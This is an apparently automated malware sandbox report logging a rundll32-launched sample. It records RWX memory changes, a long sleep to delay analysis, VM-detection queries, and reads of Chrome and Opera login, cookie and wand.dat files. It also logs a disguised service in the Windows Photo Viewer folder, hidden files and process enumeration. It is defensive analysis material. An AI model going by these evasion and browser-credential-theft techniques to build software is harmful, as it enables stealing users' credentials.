NtProtectVirtualMemory April 10, 2023, 9:37 a.m.	process_identifier: 2120 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x778b0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:37 a.m.	process_identifier: 2120 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x745a0000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:37 a.m.	process_identifier: 2120 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74571000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:37 a.m.	process_identifier: 2120 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74251000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:37 a.m.	process_identifier: 2120 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75931000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:37 a.m.	process_identifier: 2120 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76e01000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:37 a.m.	process_identifier: 2120 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x752e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:37 a.m.	process_identifier: 2120 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f91000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 2388 region_size: 11837440 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02cc0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x744f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x744e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x744c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x744b1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x758f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75931000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76e01000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x752e1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x742f1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76971000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x742c1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74271000 process_handle: 0xffffffff	1
NtProtectVirtualMemory April 10, 2023, 9:38 a.m.	process_identifier: 2388 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x741b1000 process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

rundll32.exe tried to sleep 989 seconds, actually delayed analysis time by 989 seconds

Queries the disk size which could be used to detect virtual machine with small fixed size or dynamic allocation (6 events)

Time & API	Arguments	Status	Return
GetDiskFreeSpaceExW April 10, 2023, 9:38 a.m.	total_number_of_free_bytes: 9930260480 free_bytes_available: 9930260480 root_path: C:\ total_number_of_bytes: 34252779520	1	1
GetDiskFreeSpaceW April 10, 2023, 9:38 a.m.	number_of_free_clusters: 2420022 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 10, 2023, 9:38 a.m.	number_of_free_clusters: 2420022 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 10, 2023, 9:38 a.m.	number_of_free_clusters: 2420022 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceW April 10, 2023, 9:38 a.m.	number_of_free_clusters: 2420022 sectors_per_cluster: 8 bytes_per_sector: 512 root_path: \ total_number_of_clusters: 8362495	1	1
GetDiskFreeSpaceExW April 10, 2023, 9:38 a.m.	total_number_of_free_bytes: 9912397824 free_bytes_available: 0 root_path: C:\ total_number_of_bytes: 34252779520	1	1

Steals private information from local Internet browsers (27 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\000003.log
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Preferences
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cache\index
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG.old
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG.old
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\the-real-index
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\000003.log
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG.old
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cache\data_1
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cache\data_3
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cache\data_2
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\MANIFEST-000001
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000003.log
file	C:\Users\test22\AppData\Roaming\Opera\wand.dat
file	C:\Users\test22\AppData\Local\Programs\Opera\
registry	HKEY_CURRENT_USER\Software\Opera Software

Creates executable files on the filesystem (2 events)

file	C:\Program Files (x86)\Windows Photo Viewer\ko-KR\Edit_R_RHP..exe
file	C:\ProgramData\e5c728cd.dll

Creates hidden or system file (1 event)

Time & API	Arguments	Status	Return	Repeated
SetFileAttributesW April 10, 2023, 9:38 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\ProgramData\{9E9691C4-65F2-CA2C-E3F7-22C125DBDCFA} filepath: C:\ProgramData\{9E9691C4-65F2-CA2C-E3F7-22C125DBDCFA}	1	1	0

Creates a service (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateServiceW April 10, 2023, 9:38 a.m.	service_start_name: start_type: 2 password: display_name: Edit_R_RHP. filepath: C:\Program Files (x86)\Windows Photo Viewer\ko-KR\Edit_R_RHP..exe service_name: Edit_R_RHP. filepath_r: C:\Program Files (x86)\Windows Photo Viewer\ko-KR\Edit_R_RHP..exe desired_access: 983551 service_handle: 0x0062d0f8 error_control: 1 service_type: 272 service_manager_handle: 0x0062d468	1	6476024	0

Executes one or more WMI queries (3 events)

wmi	SELECT * FROM Win32_NetworkAdapter
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_ComputerSystem

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (41 events)

Time & API	Arguments	Status	Return
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000228 process_name: mobsync.exe process_identifier: 1800	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000228 process_name: pw.exe process_identifier: 1944	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000228 process_name: taskhost.exe process_identifier: 1156	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000228 process_name: SearchProtocolHost.exe process_identifier: 1616	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000228 process_name: SearchFilterHost.exe process_identifier: 1664	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000228 process_name: leafgrey.exe process_identifier: 1704	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000228 process_name: rundll32.exe process_identifier: 2388	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000320 process_name: svchost.exe process_identifier: 2452	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000320 process_name: mscorsvw.exe process_identifier: 2488	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000320 process_name: mscorsvw.exe process_identifier: 2604	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000320 process_name: sppsvc.exe process_identifier: 2640	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000320 process_name: 䌐CØ process_identifier: 3276800		0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x000003f0 process_name: rundll32.exe process_identifier: 2772	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x000003f0 process_name: rundll32.exe process_identifier: 2848	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000458 process_name: cmd.exe process_identifier: 2968	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000458 process_name: conhost.exe process_identifier: 2976	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x0000044c process_name: pw.exe process_identifier: 3000	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000524 process_name: Edit_R_RHP..exe process_identifier: 3032	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000524 process_name: rundll32.exe process_identifier: 3044	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000524 process_name: rundll32.exe process_identifier: 1968	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000524 process_name: inject-x86.exe process_identifier: 1684	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000510 process_name: Edit_R_RHP..exe process_identifier: 2208	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x000003b4 process_name: cmd.exe process_identifier: 2176	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x000003b4 process_name: conhost.exe process_identifier: 2184	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000880 process_name: WmiPrvSE.exe process_identifier: 2700	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000918 process_name: conhost.exe process_identifier: 2748	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000918 process_name: pw.exe process_identifier: 2720	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x0000090c process_name: cmd.exe process_identifier: 2804	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x0000090c process_name: conhost.exe process_identifier: 2864	1	1
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x0000090c process_name: pw.exe process_identifier: 2912	1	1
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000008f8 process_name: rundll32.exe process_identifier: 1948	1	1
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000008f8 process_name: cmd.exe process_identifier: 2308	1	1
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000008f8 process_name: conhost.exe process_identifier: 1740	1	1
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000008f8 process_name: pw.exe process_identifier: 288	1	1
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x0000090c process_name: conhost.exe process_identifier: 2972	1	1
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x0000090c process_name: pw.exe process_identifier: 1720	1	1
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000008f4 process_name: cmd.exe process_identifier: 948	1	1
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000008f4 process_name: conhost.exe process_identifier: 2076	1	1
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000001ec process_name: cmd.exe process_identifier: 2500	1	1
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000001ec process_name: conhost.exe process_identifier: 1656	1	1
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000001ec process_name: pw.exe process_identifier: 1208	1	1

The binary likely contains encrypted or compressed data indicative of a packer (1 event)

section

{u'size_of_data': u'0x00019e00', u'virtual_address': u'0x000ca000', u'entropy': 6.843795602413548, u'name': u'.reloc', u'virtual_size': u'0x00019c34'}

entropy

6.84379560241

description

A section with a high entropy has been found

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW April 10, 2023, 9:38 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Expresses interest in specific running processes (1 event)

process

rundll32.exe

Repeatedly searches for a not-found process, you may want to run a web browser during analysis (46 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000458 process_name: conhost.exe process_identifier: 2976		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x0000044c process_name: pw.exe process_identifier: 3000		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000460 process_name: pw.exe process_identifier: 3000		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000524 process_name: inject-x86.exe process_identifier: 1684		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000510 process_name: Edit_R_RHP..exe process_identifier: 2208		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x000005f4 process_name: Edit_R_RHP..exe process_identifier: 2208		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000600 process_name: Edit_R_RHP..exe process_identifier: 2208		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000638 process_name: Edit_R_RHP..exe process_identifier: 2208		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000424 process_name: Edit_R_RHP..exe process_identifier: 2208		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x000003b4 process_name: pw.exe process_identifier: 2348		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000648 process_name: pw.exe process_identifier: 2348		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x0000091c process_name: WmiPrvSE.exe process_identifier: 2700		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000910 process_name: WmiPrvSE.exe process_identifier: 2700		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000910 process_name: WmiPrvSE.exe process_identifier: 2700		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000918 process_name: pw.exe process_identifier: 2720		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000918 process_name: pw.exe process_identifier: 2720		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000918 process_name: pw.exe process_identifier: 2720		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000920 process_name: WmiPrvSE.exe process_identifier: 2700		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x00000920 process_name: WmiPrvSE.exe process_identifier: 2700		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x0000090c process_name: WmiPrvSE.exe process_identifier: 2700		0	0
Process32NextW April 10, 2023, 9:38 a.m.	snapshot_handle: 0x0000090c process_name: pw.exe process_identifier: 2912		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x0000033c process_name: pw.exe process_identifier: 2912		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x0000034c process_name: pw.exe process_identifier: 2912		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x00000350 process_name: WmiPrvSE.exe process_identifier: 2700		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x0000036c process_name: WmiPrvSE.exe process_identifier: 2700		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x0000036c process_name: WmiPrvSE.exe process_identifier: 2700		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000008f8 process_name: pw.exe process_identifier: 288		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x0000090c process_name: pw.exe process_identifier: 288		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x0000090c process_name: pw.exe process_identifier: 288		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x00000920 process_name: rundll32.exe process_identifier: 1948		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x00000920 process_name: rundll32.exe process_identifier: 1948		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x00000920 process_name: rundll32.exe process_identifier: 1948		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x0000090c process_name: pw.exe process_identifier: 1720		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x0000090c process_name: pw.exe process_identifier: 1720		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000008f4 process_name: pw.exe process_identifier: 1720		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000008f4 process_name: rundll32.exe process_identifier: 1948		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x00000200 process_name: rundll32.exe process_identifier: 1948		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000008f4 process_name: rundll32.exe process_identifier: 1948		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000008f4 process_name: pw.exe process_identifier: 3032		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x0000090c process_name: pw.exe process_identifier: 3032		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000001bc process_name: pw.exe process_identifier: 3032		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000001ec process_name: rundll32.exe process_identifier: 1948		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000001bc process_name: rundll32.exe process_identifier: 1948		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000001bc process_name: rundll32.exe process_identifier: 1948		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000001ec process_name: pw.exe process_identifier: 1208		0	0
Process32NextW April 10, 2023, 9:39 a.m.	snapshot_handle: 0x000001ec process_name: pw.exe process_identifier: 1208		0	0

Queries for potentially installed applications (50 out of 14823 events)

Time & API	Arguments	Status
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x0000030c options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExW April 10, 2023, 9:38 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x00000314 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
